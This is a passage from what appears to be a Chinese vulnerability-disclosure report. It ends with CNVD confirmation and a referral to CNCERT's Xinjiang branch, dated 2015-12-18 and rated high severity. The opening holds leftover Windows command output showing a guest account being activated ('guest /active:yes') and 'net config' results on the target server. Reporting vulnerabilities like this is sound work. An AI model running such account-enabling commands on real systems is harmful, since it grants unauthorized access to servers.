guest /active:yes命令成功完成。net config控制下列正在运行的服务: Server Workstation命令成功完成。
加强安全意识
危害等级:高
漏洞Rank:10
确认时间:2015-12-18 11:22
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发新疆分中心,由其后续协调网站管理单位处置。
暂无
